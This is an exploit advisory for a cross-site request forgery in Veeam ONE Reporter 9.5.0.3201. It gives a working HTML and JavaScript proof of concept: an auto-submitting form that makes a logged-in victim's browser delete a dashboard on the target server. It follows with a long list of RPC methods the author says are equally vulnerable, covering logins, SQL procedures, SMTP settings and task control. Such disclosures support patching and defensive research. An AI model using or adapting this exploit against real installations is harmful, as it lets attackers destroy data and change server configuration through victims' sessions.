Veeam ONE Reporter 9.5.0.3201 Cross Site Request Forgery

`# Exploit Title: Veeam ONE Reporter - Cross-Site Request Forgery (All Actions/Methods)  
# Exploit Author: Seyed Sadegh Khatami  
# Website: https://www.cert.ir  
# Date: 2019-04-27  
# Google Dork: N/A  
# Vendor Homepage: https://www.veeam.com/  
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html  
# Version: 9.5.0.3201  
# Tested on: Windows Server 2016  
  
  
#exploit:  
<form id='del' method='POST' action='https://[target_URL]:1239/CommonDataHandlerReadOnly.ashx'>  
<input name='f' id='dd'>  
</form>  
  
<script>  
document.getElementById("dd").value= JSON.stringify({  
id: '1',  
method: 'deleteDashboard',  
params:{ 'id' : 21}  
});  
  
document.getElementById("del").submit();   
</script>  
  
  
##########################################  
#all methods is vulnerable  
##########################################  
#addDashboard(p)  
#addDashboardUser(par)  
#addDashboardUserList(par)  
#applySchedulingForDashboard(dashboardId, taskId, config)  
#applySchedulingForFolder(folderId, taskId, config)  
#applySchedulingForReport(reportId, taskId, vmr, config)  
#canModifyDashboard(id)  
#captureContainer(data, taskId)  
#changeObjectVisibility(objectId, visible)  
#checkForUpdateReportPack(confirm)  
#checkIfAdmin()  
#checkUserPermissionsResolved(o)  
#checkWinVersion()  
#clearContainer()  
#connectToSqlServer(data, save)  
#DBExecuteProcedure(db)  
#DBStoreLoad(db)  
#DBStoreSave(db)  
#deleteDashboard(id)  
#deleteDashboardImage(imageId)  
#deleteDashboardWidget(p)  
#DeleteFolder(param)  
#deleteReportPack(name, id, type)  
#deleteTask(id)  
#doLogin(domain, login, password)  
#editDashboard(p)  
#emptyDashboardRecycleBin(o)  
#findDashboardUsers(p)  
#getAboutData()  
#getActionParameters()  
#getAdvancedData()  
#getAlarms()  
#getAllSchedulingsForDashboard(info)  
#getAllSchedulingsForFolder(info)  
#getAllSchedulingsForReport(info)  
#getBackUpTree(wsj)  
#getBusinessViewTree(wsj)  
#getComboData()  
#getCommonGridItem()  
#getConfiguration()  
#getConfigurationOverview(id)  
#getConnectedServersGridItem()  
#getDashboardData(dashboard_id)  
#getDashboardImages(p)  
#getDashboardPermissions(p)  
#getDashboardPredefiniedReports(p)  
#getDashboards(p)  
#getDashboardSSRSChartTypes(p)  
#getDashboardUserList(p)  
#getDashboardWidgetTypeData(p)  
#getDefaultUserName()  
#getDeletedDashboards(p)  
#getEnumeratingTaskContainers(id)  
#getEnumeratingTaskProperties(id)  
#getEnumeratingTaskScheduling(id)  
#getExtensionModules(p)  
#getIgnoredDatastores(p)  
#getIgnoredDatastoresDetails(p)  
#getInfrastructureTree(wsj)  
#getIsReporterFreeVersion()  
#getJobData(id)  
#getLicenseData()  
#getLicensedHVSockets(p)  
#getLicensedVMSockets(p)  
#getMetadata(query, reload)  
#getNeedToDisableTabs()  
#getNotificationData()  
#getObjectsToHide(p)  
#getOptionList()  
#getReportFilters(param)  
#getReportImageName()  
#getReportListTreeCheckbox(wsj)  
#getReportListTreeDashboard(wsj)  
#getReportListTreeWorkspace(wsj)  
#getReportManagementTree(wsj)  
#getReportsSectionsTree(wsj)  
#getReportStatistics(param)  
#getScheduleDashboardConfig(dashboardId, taskId)  
#getScheduleFolderConfig(folderId, taskId)  
#getScheduleReportConfig(reportId, taskId, packType)  
#getScriptArgumentList()  
#getServerScopeAll(wsj)  
#getSessionDetails(idwithtype)  
#getSessions(p)  
#getSessionsTaskTypes(p)  
#getSiteStatusGridItem()  
#getSmtpServerData()  
#getSqlServerData()  
#getSsrsServerData()  
#getSSRSStatus()  
#getStartStopDeleteButtonsEnabled(id)  
#getStatistics()  
#getTaskList(p)  
#getUpdateSessionInfo(o)  
#getvCloudList(p)  
#getVideoReportData(interval, intervalPeriod, scope)  
#getVmStatus()  
#getWidgetCustomChartConstructorData(p)  
#getWidgetData(r)  
#getWidgetList(item)  
#getWidgetPackList(j)  
#getWidgetParams(uid)  
#getWorkspace()  
#getWorkspaceReportGridItems(param)  
#isSmtpConfigured()  
#publishDashboard(id, publish)  
#recalculateProjects(ids)  
#removeDashboardUser(par)  
#resetReportImageName()  
#resetSchedulingForDashboard(dashboardId, taskId)  
#resetSchedulingForDashboardArray(dashboardId, taskId)  
#resetSchedulingForFolder(folderId)  
#resetSchedulingForReport(reportId, vmr)  
#resetSchedulingTaskForFolder(folderId, taskId)  
#resetSchedulingTaskForReport(reportId, taskId, vmr)  
#resetSchedulingTasksForFolderArray(folderId, taskId)  
#resetSchedulingTasksForReportArray(reportId, taskId, vmr)  
#restoreDashboard(p)  
#revokeHost(hostName)  
#revokeHostHV(hostName)  
#SaveFolder(param)  
#saveIgnoredDatastores(taskContainerId, dataStores)  
#saveSchedulingInfo(taskId, taskProp)  
#saveTask(taskProp, taskContainers, excludes)  
#sendNotificationAboutDashboardSharing(to, subject, dashboardName, dashboardUrl, permissionLevel)  
#sendTestMessage(data, setting)  
#setAdvancedData(measure)  
#setComboData(data)  
#setDashboardUserPermissions(par)  
#setDashboardWidget(p)  
#SetDragAndDropPosition(dwid, colIndex, position, height)  
#setSchedulingEnability(dashboardId, taskId, disabled)  
#setSchedulingEnabilityArray(dashboardId, taskId, disabled)  
#setSchedulingEnabilityForFolder(folderId, taskId, disabled)  
#setSchedulingEnabilityForFolderArray(folderId, taskId, disabled)  
#setSchedulingEnabilityForReport(reportId, taskId, disabled)  
#setSchedulingEnabilityForReportArray(reportId, taskId, disabled)  
#setSmtpServerData(data)  
#setSsrsServerData(data)  
#startTask(id)  
#stopTask(id)  
#system.about()  
# Returns a summary about the server implementation for display purposes.  
#system.listMethods()  
# Returns an array of method names implemented by this service.  
#system.version()  
# Returns the version server implementation using the major, minor, build and revision format.  
#testServer(tcd)  
#testSsrsConnection(data)  
#updateDashboardPosition(p)  
#updateTreeExpandedStates(wsj, a)  
#validateTaskName(tcd, id)  
##########################################  
`